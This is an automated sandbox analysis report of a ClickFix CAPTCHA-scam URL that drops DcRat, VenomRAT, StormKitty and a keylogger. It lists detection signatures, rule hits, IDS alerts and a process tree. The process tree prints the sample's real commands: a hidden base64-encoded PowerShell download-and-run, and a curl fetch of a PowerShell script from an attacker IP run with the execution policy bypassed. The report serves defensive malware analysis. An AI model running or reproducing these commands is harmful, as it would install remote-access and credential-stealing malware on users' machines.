Edit tour
Windows
Analysis Report
https://gogl.to/3HGT
Overview
General Information
| Sample URL: | https://gogl.to/3HGT |
| Analysis ID: | 1582595 |
| Infos: |   |
 | |
Detection
CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Detect drive by download via clipboard copy & paste
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected BrowserPasswordDump
Yara detected CAPTCHA Scam ClickFix
Yara detected DcRat
Yara detected Keylogger Generic
Yara detected StormKitty Stealer
Yara detected VenomRAT
AI detected suspicious Javascript
AI detected suspicious URL
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powerup Write Hijack DLL
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64_ra
chrome.exe (PID: 6448 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 5912 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2156 --fi eld-trial- handle=168 4,i,157154 6871180883 7882,63353 8021404497 2637,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6944 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://gogl. to/3HGT" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
svchost.exe (PID: 6564 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
powershell.exe (PID: 6256 cmdline: "C:\Window s\system32 \WindowsPo werShell\v 1.0\PowerS hell.exe" -WindowSty le Hidden -enc aQB3A HIAIAAtAHU AcwBlAGIAI ABoAHQAdAB wADoALwAvA DEAOAA1AC4 AMQA0ADkAL gAxADQANgA uADEANgA0A C8AdAByAHc AcwBmAGcAL gBwAHMAMQA gAHwAIABpA GUAeAA= MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 6648 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7868 cmdline:
"C:\Window s\system32 \cmd.exe" /c "C:\Win dows\Temp\ Modules.ba t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 7028 cmdline:
cmd.exe /c curl -s - H "X-Speci al-Header: qInx8F3tu JDHXgOEfPJ jbaipYaSE1 mobJ2YRyo2 rjNgnVDhJv evN8R2ku8o PCBonhmpzF b2GYqPiLhJ q" http:// 147.45.44. 131/infopa ge/vfrcxq. ps1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - curl.exe (PID: 7064 cmdline:
curl -s -H "X-Specia l-Header: qInx8F3tuJ DHXgOEfPJj baipYaSE1m obJ2YRyo2r jNgnVDhJve vN8R2ku8oP CBonhmpzFb 2GYqPiLhJq " http://1 47.45.44.1 31/infopag e/vfrcxq.p s1 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - powershell.exe (PID: 7044 cmdline:
powershell -NoProfil e -Executi onPolicy B ypass -Win dowStyle H idden -Com mand -" MD5: 04029E121A0CFA5991749937DD22A1D9) - csc.exe (PID: 8056 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\40kpnq a1.cmdline " MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 8076 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES3634.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 689F54C53B 214364B77A A6CD35DA52 CB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - RegAsm.exe (PID: 8180 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| DCRat | DCRat is a typical RAT that has been around since at least June 2019. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| 404 Keylogger, 404KeyLogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Cameleon, StormKitty | PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands. | No Attribution |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_VenomRAT | Yara detected VenomRAT | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_BrowserPasswordDump_1 | Yara detected BrowserPasswordDump | Joe Security | ||
| JoeSecurity_Keylogger_Generic_3 | Yara detected Keylogger Generic | Joe Security | ||
| Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
| Click to see the 19 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | ||
| JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
System Summary |   |
|---|
| Source: | Author: Subhash Popuri (@pbssubhash): | ||
| Source: | Author: frack113: | ||
| Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: frack113: | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: frack113: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Source: | Author: vburov: | ||
Data Obfuscation | |
|---|
| Source: | Author: Joe Security: | ||
| Source: | Author: Joe Security: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-31T01:27:28.017986+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 157.20.182.177 | 4449 | 192.168.2.16 | 50030 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-31T01:27:14.125579+0100 | 1810000 | 1 | Potentially Bad Traffic | 192.168.2.16 | 50012 | 185.149.146.164 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira: | ||
| Source: | Joe Sandbox ML: | ||
Phishing | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Joe Sandbox AI: | ||
| Source: | Joe Sandbox AI: | ||
| Source: | Joe Sandbox AI: | ||
| Source: | Joe Sandbox AI: | ||
| Source: | Joe Sandbox AI: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTP Parser: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
Software Vulnerabilities | |
|---|
| Source: | Child: | ||
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | HTTP traffic detected: | ||